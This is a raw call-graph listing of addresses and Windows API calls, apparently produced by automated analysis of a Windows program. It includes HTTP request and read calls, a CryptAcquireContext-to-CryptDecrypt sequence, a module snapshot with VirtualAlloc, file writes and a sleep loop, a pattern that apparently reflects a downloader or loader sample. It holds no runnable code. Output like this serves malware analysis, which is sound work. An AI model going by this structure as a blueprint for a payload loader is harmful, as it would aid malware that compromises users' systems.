52302->52208 52358 100070ee 52303->52358 52307 100010d3 __EH_prolog3_GS 52306->52307 52308 1000184b 27 API calls 52307->52308 52309 100010e3 HttpAddRequestHeadersA 52308->52309 52384 100017f1 52309->52384 52311 10001112 HttpAddRequestHeadersA 52312 100017f1 27 API calls 52311->52312 52313 10001132 HttpAddRequestHeadersA 52312->52313 52314 100017f1 27 API calls 52313->52314 52315 10001152 HttpAddRequestHeadersA 52314->52315 52316 10001bb9 25 API calls 52315->52316 52317 1000116d 52316->52317 52318 1000e8a5 5 API calls 52317->52318 52319 10001172 HttpSendRequestA 52318->52319 52319->52225 52319->52226 52321 10001184 __EH_prolog3_GS 52320->52321 52322 100011c5 InternetSetFilePointer 52321->52322 52323 100011e3 InternetReadFile 52322->52323 52325 1000121d __InternalCxxFrameHandler 52323->52325 52324 10001260 CallUnexpected 52326 1000127d HttpQueryInfoA 52324->52326 52325->52323 52325->52324 52327 100012a6 CoCreateInstance 52326->52327 52328 1000150a 52326->52328 52327->52328 52329 100012d8 52327->52329 52330 1000e8a5 5 API calls 52328->52330 52329->52328 52332 1000184b 27 API calls 52329->52332 52331 10001520 52330->52331 52331->52226 52333 100012f7 52332->52333 52389 10001006 30 API calls 52333->52389 52335 1000130c 52336 10001bb9 25 API calls 52335->52336 52342 1000134f CallUnexpected 52336->52342 52337 1000149d 52393 10005926 14 API calls __dosmaperr 52337->52393 52339 100014ae __InternalCxxFrameHandler 52339->52328 52340 10001427 __InternalCxxFrameHandler 52340->52337 52340->52339 52343 100014aa CallUnexpected 52340->52343 52341 100014a2 52395 1000584c 25 API calls __strnicoll 52341->52395 52342->52339 52342->52340 52346 10001456 52342->52346 52347 10001449 52342->52347 52343->52339 52394 10005926 14 API calls __dosmaperr 52343->52394 52346->52340 52391 10005926 14 API calls __dosmaperr 52346->52391 52390 10005926 14 API calls __dosmaperr 52347->52390 52349 1000144e 52392 1000584c 25 API calls __strnicoll 52349->52392 52352->52214 52396 100026ff 52353->52396 52355 10001722 52355->52158 52355->52163 52361 10007102 52358->52361 52359 10007106 52376 10001629 InternetOpenA 52359->52376 52377 10005926 14 API calls __dosmaperr 52359->52377 52361->52359 52363 10007140 52361->52363 52361->52376 52362 10007130 52378 1000584c 25 API calls __strnicoll 52362->52378 52379 100069d1 37 API calls 2 library calls 52363->52379 52366 1000714c 52367 10007156 52366->52367 52370 1000716d 52366->52370 52380 1000a31e 25 API calls 2 library calls 52367->52380 52369 100071ef 52369->52376 52381 10005926 14 API calls __dosmaperr 52369->52381 52370->52369 52371 10007244 52370->52371 52371->52376 52383 10005926 14 API calls __dosmaperr 52371->52383 52374 10007238 52382 1000584c 25 API calls __strnicoll 52374->52382 52376->52211 52376->52212 52377->52362 52378->52376 52379->52366 52380->52376 52381->52374 52382->52376 52383->52376 52385 100017ff 52384->52385 52385->52385 52386 1000180d __InternalCxxFrameHandler 52385->52386 52388 1000188f 27 API calls __InternalCxxFrameHandler 52385->52388 52386->52311 52388->52386 52389->52335 52390->52349 52391->52349 52392->52340 52393->52341 52394->52341 52395->52339 52397 10002707 52396->52397 52398 10002708 IsProcessorFeaturePresent 52396->52398 52397->52355 52400 10002b1c 52398->52400 52403 10002adf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 52400->52403 52402 10002bff 52402->52355 52403->52402 52404->52242 52405 402080 52406 4020fb 52405->52406 52407 40209d 52405->52407 52409 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52406->52409 52407->52406 52408 4020a3 CreateFileA 52407->52408 52408->52406 52410 4020c3 WriteFile CloseHandle 52408->52410 52411 402109 52409->52411 52412 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52410->52412 52413 4020f5 52412->52413 52414 444ea4 52415 444eb0 _setlocale 52414->52415 52416 444ec8 52415->52416 52419 444fb2 _setlocale 52415->52419 52445 4405e1 RtlFreeHeap __dosmaperr __mbsnbicmp_l 52415->52445 52418 444ed6 52416->52418 52446 4405e1 RtlFreeHeap __dosmaperr __mbsnbicmp_l 52416->52446 52421 444ee4 52418->52421 52447 4405e1 RtlFreeHeap __dosmaperr __mbsnbicmp_l 52418->52447 52423 444ef2 52421->52423 52448 4405e1 RtlFreeHeap __dosmaperr __mbsnbicmp_l 52421->52448 52424 444f00 52423->52424 52449 4405e1 RtlFreeHeap __dosmaperr __mbsnbicmp_l 52423->52449 52427 444f0e 52424->52427 52450 4405e1 RtlFreeHeap __dosmaperr __mbsnbicmp_l 52424->52450 52430 444f1c 52427->52430 52451 4405e1 RtlFreeHeap __dosmaperr __mbsnbicmp_l 52427->52451 52431 444f2d 52430->52431 52452 4405e1 RtlFreeHeap __dosmaperr __mbsnbicmp_l 52430->52452 52442 447a93 52431->52442 52434 444f5a __freefls@4 52435 447a93 __lock RtlFreeHeap 52434->52435 52440 444f6e ___removelocaleref 52435->52440 52436 444f35 52436->52434 52453 4405e1 RtlFreeHeap __dosmaperr __mbsnbicmp_l 52436->52453 52438 444f9f __freefls@4 52455 4405e1 RtlFreeHeap __dosmaperr __mbsnbicmp_l 52438->52455 52440->52438 52454 447708 RtlFreeHeap _free ___free_lconv_mon ___free_lconv_num ___free_lc_time 52440->52454 52443 447abb RtlFreeHeap 52442->52443 52444 447aa8 __mtinitlocknum __amsg_exit 52442->52444 52443->52436 52444->52443 52445->52416 52446->52418 52447->52421 52448->52423 52449->52424 52450->52427 52451->52430 52452->52431 52453->52434 52454->52438 52455->52419 52456 413388 52459 4196e8 52456->52459 52458 4133a0 52460 41971c __dosmaperr 52459->52460 52461 4196f3 RtlFreeHeap 52459->52461 52460->52458 52461->52460 52462 419708 52461->52462 52465 411401 14 API calls __dosmaperr 52462->52465 52464 41970e GetLastError 52464->52460 52465->52464 52466 100079ee 52467 10007a2c 52466->52467 52471 100079fc __dosmaperr 52466->52471 52474 10005926 14 API calls __dosmaperr 52467->52474 52468 10007a17 RtlAllocateHeap 52470 10007a2a 52468->52470 52468->52471 52471->52467 52471->52468 52473 10005aed EnterCriticalSection LeaveCriticalSection __dosmaperr 52471->52473 52473->52471 52474->52470 52475 4034b0 CryptAcquireContextW 52476 4035fa GetLastError CryptReleaseContext 52475->52476 52477 40353e CryptCreateHash 52475->52477 52481 403744 52476->52481 52477->52476 52478 403562 52477->52478 52482 40cfd1 27 API calls 52478->52482 52479 40376a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52480 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52479->52480 52483 40378e 52480->52483 52481->52479 52484 403792 52481->52484 52485 40359a 52482->52485 52486 411337 25 API calls 52484->52486 52501 41366b 52485->52501 52488 403797 52486->52488 52505 40e131 26 API calls 3 library calls 52488->52505 52491 4035d6 CryptDeriveKey 52491->52476 52494 403615 52491->52494 52492 4035c8 GetLastError 52492->52481 52493 4037c3 52495 4133dd _Yarn 15 API calls 52494->52495 52496 40361b _Yarn 52495->52496 52497 40cfd1 27 API calls 52496->52497 52500 40363a _Yarn 52497->52500 52498 403738 CryptDestroyKey 52498->52481 52499 4036ac CryptDecrypt 52499->52498 52499->52500 52500->52498 52500->52499 52502 413679 52501->52502 52506 4133e8 52502->52506 52505->52493 52507 4133ff 52506->52507 52508 413411 52507->52508 52509 413429 52507->52509 52519 4035ac CryptHashData 52507->52519 52533 411401 14 API calls __dosmaperr 52508->52533 52535 411431 37 API calls 2 library calls 52509->52535 52512 413434 52514 413461 52512->52514 52515 413442 52512->52515 52513 413416 52534 411327 25 API calls _mbstowcs 52513->52534 52518 413533 52514->52518 52520 413469 52514->52520 52536 41b42a 19 API calls 3 library calls 52515->52536 52518->52519 52541 41b342 MultiByteToWideChar 52518->52541 52519->52491 52519->52492 52520->52519 52537 41b342 MultiByteToWideChar 52520->52537 52523 4134ab 52523->52519 52525 4134b6 GetLastError 52523->52525 52524 41355d 52524->52519 52542 411401 14 API calls __dosmaperr 52524->52542 52526 413516 52525->52526 52532 4134c1 52525->52532 52526->52519 52540 411401 14 API calls __dosmaperr 52526->52540 52528 413500 52539 41b342 MultiByteToWideChar 52528->52539 52532->52526 52532->52528 52538 41b308 37 API calls _mbstowcs 52532->52538 52533->52513 52534->52519 52535->52512 52536->52519 52537->52523 52538->52532 52539->52526 52540->52519 52541->52524 52542->52519 52543 440dd5 52544 440de1 _setlocale 52543->52544 52575 443073 HeapCreate 52544->52575 52546 440e4e 52547 440e59 52546->52547 52619 440dac RtlFreeHeap __FF_MSGBANNER _doexit __NMSG_WRITE 52546->52619 52576 444fd3 52547->52576 52550 440e5f 52551 440e6a __RTC_Initialize 52550->52551 52620 440dac RtlFreeHeap __FF_MSGBANNER _doexit __NMSG_WRITE 52550->52620 52589 444085 52551->52589 52555 440e83 52595 444c36 52555->52595 52558 440e94 52600 444b88 52558->52600 52560 440e9e 52561 440ea9 52560->52561 52622 443391 RtlFreeHeap __FF_MSGBANNER __amsg_exit __NMSG_WRITE 52560->52622 52604 444956 52561->52604 52564 440eaf 52565 440eba 52564->52565 52623 443391 RtlFreeHeap __FF_MSGBANNER __amsg_exit __NMSG_WRITE 52564->52623 52615 443170 52565->52615 52568 440ec2 52570 440ecd __wwincmdln 52568->52570 52624 443391 RtlFreeHeap __FF_MSGBANNER __amsg_exit __NMSG_WRITE 52568->52624 52571 440efd 52570->52571 52625 443347 RtlFreeHeap _doexit 52570->52625 52626 443373 RtlFreeHeap _doexit 52571->52626 52574 440f02 _setlocale 52575->52546 52577 444fe1 52576->52577 52578 444fe7 52577->52578 52583 444ff0 __init_pointers 52577->52583 52627 444d20 RtlFreeHeap _free 52578->52627 52580 444fec 52580->52550 52581 445144 52633 444d20 RtlFreeHeap _free 52581->52633 52583->52581 52588 445131 52583->52588 52628 442a5c 52583->52628 52586 445129 52632 444d5d RtlFreeHeap __lock __getptd_noexit ___addlocaleref _setlocale 52586->52632 52588->52550 52590 444098 52589->52590 52591 442a5c __calloc_crt RtlFreeHeap 52590->52591 52593 4440a3 52591->52593 52592 442a5c __calloc_crt RtlFreeHeap 52592->52593 52593->52592 52594 440e78 52593->52594 52594->52555 52621 443391 RtlFreeHeap __FF_MSGBANNER __amsg_exit __NMSG_WRITE 52594->52621 52597 444c3f 52595->52597 52596 444c47 52596->52558 52597->52596 52640 442a17 RtlFreeHeap _malloc 52597->52640 52599 444c6d _memmove 52599->52558 52601 444bae _wparse_cmdline 52600->52601 52603 444c00 _wparse_cmdline 52601->52603 52641 442a17 RtlFreeHeap _malloc 52601->52641 52603->52560 52605 44496e _wcslen 52604->52605 52614 444966 __invoke_watson 52604->52614 52606 442a5c __calloc_crt RtlFreeHeap 52605->52606 52610 444992 _wcslen 52606->52610 52607 4449e8 52643 4405e1 RtlFreeHeap __dosmaperr __mbsnbicmp_l 52607->52643 52609 442a5c __calloc_crt RtlFreeHeap 52609->52610 52610->52607 52610->52609 52611 444a0e 52610->52611 52610->52614 52642 44c0ed RtlFreeHeap __mbsnbicmp_l 52610->52642 52644 4405e1 RtlFreeHeap __dosmaperr __mbsnbicmp_l 52611->52644 52614->52564 52616 44317e __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 52615->52616 52618 4431bd __IsNonwritableInCurrentImage 52616->52618 52645 4408cb RtlFreeHeap __cinit 52616->52645 52618->52568 52619->52547 52620->52551 52625->52571 52626->52574 52627->52580 52630 442a65 52628->52630 52631 442aa2 52630->52631 52634 44a2d4 52630->52634 52631->52581 52631->52586 52632->52588 52633->52588 52635 44a2e0 52634->52635 52637 44a2fb _malloc 52634->52637 52635->52637 52639 44302a RtlFreeHeap __getptd_noexit 52635->52639 52637->52630 52638 44a2f1 52638->52630 52639->52638 52640->52599 52641->52603 52642->52610 52643->52614 52644->52614 52645->52618 52646 10005bf4 52647 10007a3c _free 14 API calls 52646->52647 52648 10005c0c 52647->52648 52649 774361 52650 774370 52649->52650 52653 774b01 52650->52653 52654 774b1c 52653->52654 52655 774b25 CreateToolhelp32Snapshot 52654->52655 52656 774b41 Module32First 52654->52656 52655->52654 52655->52656 52657 774379 52656->52657 52658 774b50 52656->52658 52660 7747c0 52658->52660 52661 7747eb 52660->52661 52662 7747fc VirtualAlloc 52661->52662 52663 774834 52661->52663 52662->52663 52663->52663 52664 40d4f8 52665 40d504 __FrameHandler3::FrameUnwindToState 52664->52665 52692 40d258 52665->52692 52667 40d50b 52668 40d65e 52667->52668 52671 40d535 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 52667->52671 52786 40d7b5 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __FrameHandler3::FrameUnwindToState 52668->52786 52670 40d665 52787 414d8d 52670->52787 52676 40d554 52671->52676 52677 40d5d5 52671->52677 52782 414d67 37 API calls 3 library calls 52671->52782 52675 40d673 52700 40d8d0 52677->52700 52684 40d5f0 52783 40d906 GetModuleHandleW 52684->52783 52686 40d5f7 52686->52670 52687 40d5fb 52686->52687 52688 40d604 52687->52688 52784 414d42 23 API calls __FrameHandler3::FrameUnwindToState 52687->52784 52785 40d3c9 73 API calls ___scrt_uninitialize_crt 52688->52785 52691 40d60c 52691->52676 52693 40d261 52692->52693 52791 40d9b3 IsProcessorFeaturePresent 52693->52791 52695 40d26d 52792 40faa6 10 API calls 2 library calls 52695->52792 52697 40d272 52698 40d276 52697->52698 52793 40fac5 7 API calls 2 library calls 52697->52793 52698->52667 52794 40ea40 52700->52794 52703 40d5db 52704 417166 52703->52704 52796 41ee83 52704->52796 52706 40d5e3 52709 408e60 52706->52709 52707 41716f 52707->52706 52802 41f129 37 API calls 52707->52802 52710 408ec6 52709->52710 52710->52710 52711 402460 27 API calls 52710->52711 52712 408edc __FrameHandler3::FrameUnwindToState 52711->52712 52805 409fc0 52712->52805 52714 408f22 52834 40b9b0 52714->52834 52716 408fb3 52717 408fd6 GetModuleFileNameA 52716->52717 52718 4093fe 52716->52718 52721 409011 52717->52721 52731 409474 52718->52731 52753 4093f9 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52718->52753 53289 40d10c 6 API calls 52718->53289 52721->52721 52727 402460 27 API calls 52721->52727 52722 408f52 52722->52716 52725 40b9b0 27 API calls 52722->52725 53264 40a850 52722->53264 53280 40b220 27 API calls 3 library calls 52722->53280 52723 40a850 27 API calls 52726 40957f 52723->52726 52725->52722 52729 40a850 27 API calls 52726->52729 52730 40902d 52727->52730 52728 409439 52728->52731 53290 40d41e 28 API calls 52728->53290 52732 40958a 52729->52732 52736 409062 52730->52736 52737 4091e7 52730->52737 52734 402460 27 API calls 52731->52734 52735 4063d0 63 API calls 52732->52735 52739 4094ea 52734->52739 52745 40958f std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52735->52745 52752 4090cf 52736->52752 53281 40d10c 6 API calls 52736->53281 52748 409216 52737->52748 52749 40936f 52737->52749 52738 409467 53291 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 52738->53291 52739->52753 53292 40b040 27 API calls 3 library calls 52739->53292 52744 4096aa 52751 411337 25 API calls 52744->52751 52745->52744 53293 409bf0 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52745->53293 52746 409095 52746->52752 53282 40d41e 28 API calls 52746->53282 52747 4095fe std::ios_base::_Ios_base_dtor 53294 40a580 25 API calls 2 library calls 52747->53294 52765 409283 52748->52765 53285 40d10c 6 API calls 52748->53285 52750 402460 27 API calls 52749->52750 52755 409394 52750->52755 52779 4096af 52751->52779 52756 402460 27 API calls 52752->52756 52753->52723 52753->52744 52759 402460 27 API calls 52755->52759 52761 40915a 52756->52761 52758 4090c2 53283 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 52758->53283 52764 4093b9 52759->52764 52781 409168 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52761->52781 53284 40b040 27 API calls 3 library calls 52761->53284 52762 409249 52762->52765 53286 40d41e 28 API calls 52762->53286 52842 4063d0 52764->52842 52770 402460 27 API calls 52765->52770 52766 409650 52766->52744 52771 40967c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52766->52771 52774 40930a 52770->52774 52773 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52771->52773 52772 409276 53287 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 52772->53287 52776 40969c 52773->52776 52774->52781 53288 40b040 27 API calls 3 library calls 52774->53288 52776->52684 52778 4096a5 52780 411337 25 API calls 52778->52780 52779->52684 52780->52744 52781->52753 52781->52778 52782->52677 52783->52686 52784->52688 52785->52691 52786->52670 53624 414c2b 52787->53624 52790 414d51 23 API calls __FrameHandler3::FrameUnwindToState 52790->52675 52791->52695 52792->52697 52793->52698 52795 40d8e3 GetStartupInfoW 52794->52795 52795->52703 52797 41eebe 52796->52797 52798 41ee8c 52796->52798 52797->52707 52803 418ee0 37 API calls 3 library calls 52798->52803 52800 41eeaf 52804 41eccf 47 API calls 4 library calls 52800->52804 52802->52707 52803->52800 52804->52797 53295 404150 52805->53295 52807 40a0b2 53304 4015c0 27 API calls 4 library calls 52807->53304 52809 40a0b9 53305 40c516 43 API calls 5 library calls 52809->53305 52811 40a0d3 53306 40abe0 74 API calls 5 library calls 52811->53306 52813 40a14d 53307 4015c0 27 API calls 4 library calls 52813->53307 52814 40a104 52814->52813 52815 404150 27 API calls 52814->52815 52815->52813 52817 40a17f 53308 40c516 43 API calls 5 library calls 52817->53308 52819 40a196 52820 40a2a8 52819->52820 52821 40a228 52819->52821 53311 40c289 RaiseException Concurrency::cancel_current_task 52820->53311 52823 40a248 _Yarn 52821->52823 52825 40a253 52821->52825 52826 40a234 52821->52826 52823->52714 52824 40a2ad 53312 4015c0 27 API calls 2 library calls 52824->53312 53310 4015c0 27 API calls 4 library calls 52825->53310 52826->52824 52829 40a23b 52826->52829 53309 4015c0 27 API calls 4 library calls 52829->53309 52830 40a241 52830->52823 52832 411337 25 API calls 52830->52832 52833 40a2b7 52832->52833 52833->52714 52835 40b9fc 52834->52835 53316 40bf10 52835->53316 52837 404150 27 API calls 52838 40bbe4 52837->52838 52838->52722 52839 40ba65 52839->52837 52841 40ba10 52841->52839 53323 40b4e0 27 API calls 4 library calls 52841->53323 53325 414f0a GetSystemTimeAsFileTime 52842->53325 52844 40641f 53327 414dc4 52844->53327 52847 402460 27 API calls 52849 40645e std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52847->52849 52848 402460 27 API calls 52875 4064c9 __FrameHandler3::FrameUnwindToState std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52848->52875 52849->52848 52849->52875 52852 40cfd1 27 API calls 52852->52875 52853 4068b1 53367 407310 52853->53367 52856 4068d8 53377 4022c0 52856->53377 52859 4068e8 53381 4021f0 52859->53381 52863 4068fc 52864 4069d1 52863->52864 52865 406904 52863->52865 53452 4075b0 39 API calls 2 library calls 52864->53452 52871 406974 52865->52871 52872 406917 52865->52872 52866 411337 25 API calls 52866->52875 52869 4069d6 52877 4022c0 27 API calls 52869->52877 52870 406865 Sleep 52870->52875 53447 4074a0 39 API calls 2 library calls 52871->53447 53442 407390 39 API calls 2 library calls 52872->53442 52875->52852 52875->52853 52875->52866 52875->52870 52879 402460 27 API calls 52875->52879 52883 40688a 52875->52883 52891 406871 52875->52891 52893 40685b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52875->52893 53330 414eda 52875->53330 53334 404450 52875->53334 53346 40b900 52875->53346 53351 401d20 52875->53351 53434 40d10c 6 API calls 52875->53434 53435 40d41e 28 API calls 52875->53435 53436 40d0c2 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 52875->53436 52876 40691c 52881 4022c0 27 API calls 52876->52881 52880 4069e6 52877->52880 52878 406979 52882 4022c0 27 API calls 52878->52882 52879->52875 52885 4021f0 25 API calls 52880->52885 52884 40692c 52881->52884 52886 406989 52882->52886 53440 40a800 27 API calls 52883->53440 53443 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52884->53443 52889 4069fa 52885->52889 53448 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52886->53448 52895 406ad0 52889->52895 52896 406a02 52889->52896 52891->52883 53437 4045e0 52891->53437 52892 406896 52899 4021f0 25 API calls 52892->52899 52893->52870 52894 406935 52900 4021f0 25 API calls 52894->52900 53461 407950 39 API calls 2 library calls 52895->53461 53453 407630 39 API calls 2 library calls 52896->53453 52897 406992 52903 4021f0 25 API calls 52897->52903 52905 40689e 52899->52905 52906 40693d 52900->52906 52904 40699a 52903->52904 53449 407530 39 API calls 2 library calls 52904->53449 52910 4021f0 25 API calls 52905->52910 53444 407420 39 API calls 2 library calls 52906->53444 52907 406a07 52917 4022c0 27 API calls 52907->52917 52908 406ad5 52915 4022c0 27 API calls 52908->52915 52913 4068a6 52910->52913 52912 40699f 52920 4022c0 27 API calls 52912->52920 53441 4016d0 CoUninitialize 52913->53441 52914 406942 52921 4022c0 27 API calls 52914->52921 52918 406ae5 52915->52918 52919 406a17 52917->52919 52928 4021f0 25 API calls 52918->52928 53454 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52919->53454 52924 4069af 52920->52924 52925 406952 52921->52925 52923 406a20 52927 4021f0 25 API calls 52923->52927 53450 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52924->53450 53445 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52925->53445 52931 406a28 52927->52931 52932 406af9 52928->52932 52930 40695b 52934 4021f0 25 API calls 52930->52934 53455 4076b0 39 API calls 2 library calls 52931->53455 52936 406bba 52932->52936 53462 4079d0 39 API calls 2 library calls 52932->53462 52933 4069b8 52937 4021f0 25 API calls 52933->52937 52938 406963 52934->52938 53470 407cf0 39 API calls 2 library calls 52936->53470 52942 4069c0 52937->52942 53446 40a800 27 API calls 52938->53446 52939 406a2d 52948 4022c0 27 API calls 52939->52948 53451 40a800 27 API calls 52942->53451 52944 406b06 52951 4022c0 27 API calls 52944->52951 52945 406bc4 52952 4022c0 27 API calls 52945->52952 52947 40696f 52949 406f5a 52947->52949 53508 4021c0 27 API calls 52947->53508 52950 406a3d 52948->52950 53389 401670 52949->53389 53456 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52950->53456 52956 406b16 52951->52956 52957 406bd4 52952->52957 53463 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52956->53463 52965 4021f0 25 API calls 52957->52965 52958 406f6d 53393 408a70 52958->53393 52959 406a46 52962 4021f0 25 API calls 52959->52962 52967 406a4e 52962->52967 52963 406b1f 52964 4021f0 25 API calls 52963->52964 52968 406b27 52964->52968 52969 406be8 52965->52969 52966 406f76 52977 4022c0 27 API calls 52966->52977 53457 407730 39 API calls 2 library calls 52967->53457 53464 407a50 39 API calls 2 library calls 52968->53464 52972 406ccf 52969->52972 53471 407d70 39 API calls 2 library calls 52969->53471 53481 408110 39 API calls 2 library calls 52972->53481 52973 406a53 52981 4022c0 27 API calls 52973->52981 52975 406b2c 52984 4022c0 27 API calls 52975->52984 52980 406f89 52977->52980 52978 406cd9 52986 4022c0 27 API calls 52978->52986 52979 406bf5 52988 4022c0 27 API calls 52979->52988 53403 4089f0 52980->53403 52983 406a63 52981->52983 52992 4021f0 25 API calls 52983->52992 52987 406b3c 52984->52987 52985 406f94 52995 4022c0 27 API calls 52985->52995 52989 406ce9 52986->52989 53465 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52987->53465 52991 406c05 52988->52991 53003 4021f0 25 API calls 52989->53003 53472 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52991->53472 52997 406a77 52992->52997 52993 406b45 52998 4021f0 25 API calls 52993->52998 52996 406fa7 52995->52996 53413 408950 52996->53413 53001 406a98 52997->53001 53002 406a7b 52997->53002 53004 406b4d 52998->53004 52999 406c0e 53005 4021f0 25 API calls 52999->53005 53459 407840 39 API calls 2 library calls 53001->53459 53458 4077c0 39 API calls 2 library calls 53002->53458 53008 406cfd 53003->53008 53466 407ad0 39 API calls 2 library calls 53004->53466 53010 406c16 53005->53010 53006 406fb2 53021 4022c0 27 API calls 53006->53021 53014 406d01 53008->53014 53015 406d7f 53008->53015 53473 407df0 39 API calls 2 library calls 53010->53473 53012 406a9d 53025 4022c0 27 API calls 53012->53025 53013 406a80 53027 4022c0 27 API calls 53013->53027 53482 4081a0 39 API calls 2 library calls 53014->53482 53488 408330 39 API calls 2 library calls 53015->53488 53016 406b52 53024 4022c0 27 API calls 53016->53024 53020 406c1b 53029 4022c0 27 API calls 53020->53029 53026 406fc5 53021->53026 53022 406d84 53035 4022c0 27 API calls 53022->53035 53023 406d06 53036 4022c0 27 API calls 53023->53036 53028 406b62 53024->53028 53030 406aad 53025->53030 53423 40ad00 53026->53423 53032 406a90 53027->53032 53043 4021f0 25 API calls 53028->53043 53033 406c2b 53029->53033 53045 4021f0 25 API calls 53030->53045 53507 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53032->53507 53474 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53033->53474 53041 406d94 53035->53041 53037 406d16 53036->53037 53483 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53037->53483 53054 4021f0 25 API calls 53041->53054 53049 406b76 53043->53049 53044 406c34 53050 4021f0 25 API calls 53044->53050 53051 406ac1 53045->53051 53046 406ff2 53431 40ae10 53046->53431 53047 406f41 53053 4021f0 25 API calls 53047->53053 53048 406d1f 53055 4021f0 25 API calls 53048->53055 53056 406b84 53049->53056 53057 406b7a 53049->53057 53058 406c3c 53050->53058 53051->52947 53460 4078d0 39 API calls 2 library calls 53051->53460 53053->52947 53060 406da8 53054->53060 53061 406d27 53055->53061 53468 407be0 39 API calls 2 library calls 53056->53468 53467 407b60 39 API calls 2 library calls 53057->53467 53475 407e70 39 API calls 2 library calls 53058->53475 53067 406e2a 53060->53067 53068 406dac 53060->53068 53484 408220 39 API calls 2 library calls 53061->53484 53066 40ad60 27 API calls 53072 40701f 53066->53072 53495 408540 39 API calls 2 library calls 53067->53495 53489 4083c0 39 API calls 2 library calls 53068->53489 53070 406c41 53081 4022c0 27 API calls 53070->53081 53071 406b89 53082 4022c0 27 API calls 53071->53082 53076 40ae10 27 API calls 53072->53076 53075 406d2c 53084 4022c0 27 API calls 53075->53084 53077 407034 53076->53077 53080 40ad60 27 API calls 53077->53080 53078 406e2f 53088 4022c0 27 API calls 53078->53088 53079 406db1 53089 4022c0 27 API calls 53079->53089 53083 40704c 53080->53083 53085 406c51 53081->53085 53086 406b99 53082->53086 53087 4021f0 25 API calls 53083->53087 53090 406d3c 53084->53090 53476 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53085->53476 53098 4021f0 25 API calls 53086->53098 53092 40705a 53087->53092 53093 406e3f 53088->53093 53094 406dc1 53089->53094 53485 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53090->53485 53099 4021f0 25 API calls 53092->53099 53109 4021f0 25 API calls 53093->53109 53490 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53094->53490 53096 406c5a 53097 4021f0 25 API calls 53096->53097 53102 406c62 53097->53102 53103 406bad 53098->53103 53104 407065 53099->53104 53101 406d45 53106 4021f0 25 API calls 53101->53106 53477 407ef0 39 API calls 2 library calls 53102->53477 53103->52947 53469 407c70 39 API calls 2 library calls 53103->53469 53108 4021f0 25 API calls 53104->53108 53105 406dca 53110 4021f0 25 API calls 53105->53110 53111 406d4d 53106->53111 53114 407070 53108->53114 53115 406e53 53109->53115 53116 406dd2 53110->53116 53486 4082b0 39 API calls 2 library calls 53111->53486 53112 406c67 53128 4022c0 27 API calls 53112->53128 53119 4021f0 25 API calls 53114->53119 53120 406e57 53115->53120 53121 406eaa 53115->53121 53491 408440 39 API calls 2 library calls 53116->53491 53118 406d52 53131 4022c0 27 API calls 53118->53131 53125 40707b 53119->53125 53496 4085d0 39 API calls 2 library calls 53120->53496 53501 408750 39 API calls 2 library calls 53121->53501 53123 406dd7 53134 4022c0 27 API calls 53123->53134 53130 4021f0 25 API calls 53125->53130 53127 406e5c 53137 4022c0 27 API calls 53127->53137 53132 406c77 53128->53132 53129 406eaf 53140 4022c0 27 API calls 53129->53140 53133 407086 53130->53133 53135 406d62 53131->53135 53145 4021f0 25 API calls 53132->53145 53136 4021f0 25 API calls 53133->53136 53138 406de7 53134->53138 53487 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53135->53487 53141 407091 53136->53141 53142 406e6c 53137->53142 53492 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53138->53492 53146 406ebf 53140->53146 53147 4021f0 25 API calls 53141->53147 53497 402240 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 53142->53497 53144 406d6b 53151 4021f0 25 API calls 53144->53151 53152 406c8b 53145->53152 53161 4021f0 25 API calls 53146->53161 53148 40709c 53147->53148 53153 4021f0 25 API calls 53148->53153 53150 406df0 53155 4021f0 25 API calls 53150->53155 53151->52947 53156 406c94 53152->53156 53478 407f80 39 API calls 2 library calls 53152->53478 53197 4070ab 53153->53197 53154 406e75 53158 4021f0 25 API calls 53154->53158 53159 406df8 53155->53159 53479 408000 39 API calls 2 library calls 53156->53479 53163 406e7d 